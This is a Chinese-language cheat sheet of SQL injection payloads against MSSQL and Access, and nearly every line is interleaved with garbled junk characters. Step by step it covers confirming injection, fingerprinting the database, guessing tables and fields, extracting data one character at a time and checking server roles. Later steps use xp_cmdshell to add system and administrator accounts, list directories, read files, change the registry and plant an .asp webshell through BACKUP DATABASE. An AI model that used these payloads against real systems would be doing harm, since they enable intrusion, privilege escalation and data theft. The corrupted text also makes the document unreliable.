1.判断是否有注入;and 1=1 ;and 1=2 z7T�y�S�.z
2.初步判断是否是mssql ;and user>0 W:K��'2��j
X!m
l�C5�1
3.注入参数是字符'and [查询条件] and ''=' ]�,�Yy)<e.
L�L==2KNUo
4.搜索时没过滤参数的'and [查询条件] and '%25'=' a�4pe��wg'
4eJ�R=�h1�
5.判断数据库系统 8{_lB#�<[E
.eLd�0{JtN
;and (select count(*) from sysobjects)>0 mssql 4is��s�j$�
l2�I%$|�)d
;and (select count(*) from msysobjects)>0 access Udq�!�YXE0
Bv�UiH<-�D
z"Mk(d@-�E
�F~eY'~&H}
6.猜数据库 ;and (select Count(*) from [数据库名])>0 8�|z�Ogn�{
_n_()a�t)�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ARE��jS�$
s���;$f6X�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 `�46z D
�?
+w�f9!_'��
9.(1)猜字段的ascii值(access) 5lM2nhlf'b
I&31jn_o
/
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 @�0d���"^
2�16�$,�4i
(2)猜字段的ascii值(mssql) e�5
}amr�z
B{�*{9!(l9
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 V:vqt�@���
gd*2*o$g(�
10.测试权限结构(mssql) Qj*�.Z4�ue
k�eFH
CC��
�MpBdke$�
~9E_�L?TW*
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ��w)`�XM��
N$�x&k$w R
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �Eku����9u
RB|�i<`Z��
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �8�g
Z�)c\
@5ud{"|�2�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 2`�TV(U��@
�c+
e��~BN
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- AV7#,+p%G�
cqSXX++CS,
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- _{-[1-lN5_
dDIR��~�!T
;and 1=(select IS_MEMBER('db_owner'));-- �~�$J(it-a
��gdA2u;q�
=/`]lY���&
oe�B'{�bG
11.添加mssql和系统的帐户 �Fxc_s/^=t
O^�j*"#�f
;exec master.dbo.sp_addlogin username;-- &K�{8-�
t�
;exec master.dbo.sp_password null,username,password;-- �n\3#69VY
J=t}�9.H~=
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- }�M�L2��-k
&lLfV�a�-l
;exec master.dbo.xp_cmdshell 'net user username password U||Ge��Ed�
�`;J�`O0�2
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Y���Wv�D+�
X6r0+D5AvB
;exec master.dbo.xp_cmdshell 'net user username password /add';-- !�ltq@8#_|
fBj)H�oHQW
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- >36,�lNt�
X;N�?L%Pp
^'0N%`�bY!
�hlB��\�Xt
12.(1)遍历目录 (+[%^96 ��
��xcU!bDV�
;create table dirs(paths varchar(100), id int) (D) K�U9B>
oJ\g0|\qwe
;insert dirs exec master.dbo.xp_dirtree 'c:\' �%l��!?d`?
{��
]_�j)R
;and (select top 1 paths from dirs)>0 L�*tfY�onq
w2'q�9�pB+
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �>It�T269G
)38%E;T{X�
�(u} /(�Ux
�FV�/t���
(2)遍历目录 &�U�O�xS W
DZtpY��{=Z
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- >�Vjn]V5y�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �!@F {�F�R
f|FS%]fCxk
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 "`�V@�?+3�
�BB��\�GrD
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ]JY��E#�F�
,���>h�"~X
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ��o+'|j�#P
�5P%#�5Yr2
gS5��M�oW1
Y=O+�d\_W
13.mssql中的存储过程 �rR-�[C�T�
Q(nTL �WW
xp_regenumvalues 注册表根键, 子键 �q.`<����q
e;"�J�,7�@
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 � E|"SM�A,
l|?tqCT ^h
xp_regread 根键,子键,键值名 \�&hq���$�
�z3�K$gEve
;exec xp_regread �3N�L���n}
g"�1V�]��
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ����jez0 A
J<QZ)<�T,&
xp_regwrite 根键,子键, 值名, 值类型, 值 �b>�O�B}Is
��L)J�1yw�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 !�SW0iq[7j
6�/mz.,�g2
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 J�
W@6��m�
Wv�f>5g�)?
xp_regdeletevalue 根键,子键,值名 �gZ$�
8Y7�
E��6TeZ�%g
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 5 �ix*wu`,
/D�Hg�w�pJ
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �hbH~Ya=+S
*v+��l,z4n
oxlor,lw/�
���IDH~nMz
14.mssql的backup创建webshell 6I�
+0@�,I
ES&�u*X�:
use model 7���qB�4_�
1"ZtE\{
�"
create table cmd(str image); �+9b{Y^^~T
KHML!f=mu�
insert into cmd(str) values (''); I.j�qC2��G
O�R+�qi*)�
backup database model to disk='c:\l.asp'; Z��yUcL_��
$:F+�Nf
8
i�"0B�c{cQ
�5p[�}<�I{
15.mssql内置函数 �Q�PDh!A3T
FpRYffT 9u
;and (select @@version)>0 获得Windows的版本号 � n?EgC8b9
KU�UA>�'=
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �K>���$f#^
!Zj�]0�,^
;and (select user_name())>0 爆当前系统的连接用户 �pY"WW0p"C
�ls^�Z"9P�
;and (select db_name())>0 得到当前连接的数据库 =� U�H3.��
[�� u�lub|
�<b�zzbR[F
�lLTq�k\8g
16.简洁的webshell �e
c&Y��2�
kL*P �3
�0
use model #u�hUZ��q�
2e�1K�F=N+
create table cmd(str image); 6WY/[TC�-�
@=�Q!a (�g
insert into cmd(str) values (''); X�Gx[Ny_A2
*vD.�\e��~
backup database model to disk='g:\wwwtest\l.asp';
